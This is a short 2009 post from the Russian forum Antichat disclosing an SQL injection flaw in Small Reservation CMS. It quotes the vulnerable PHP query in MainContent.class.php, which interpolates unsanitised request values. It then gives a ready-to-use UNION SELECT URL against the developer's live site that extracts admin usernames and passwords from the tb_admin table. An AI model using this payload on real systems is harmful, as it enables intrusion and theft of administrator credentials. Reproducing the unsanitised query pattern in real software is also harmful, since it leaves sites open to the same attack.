Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Small Reservation CMS (https://forum.antichat.xyz/showthread.php?t=143720)

Ded MustD!e 26.09.2009 04:39

Small Reservation CMS
 
Уязвимость: SQL-Inj
Продукт: Small Reservation CMS
Уязвимый файл MainContent.class.php
Код:
PHP код:

if($res $this->db->query("SELECT rentobject_id,name,marke,
                            weight,power,engine,imgurl
                            FROM tb_
{$this->subcmd}
                            WHERE rentobject_id = 
{$this->id}")) 

Пример на сайте разработчика:
Код:

http://www.fastproject.ch/smallCMS/index.php?pageid=8&rentobject_id=1+union+select+1,concat_ws(0x3a,admin_user,admin_pw),3,4,5,6,7+from+tb_admin--


Время: 06:39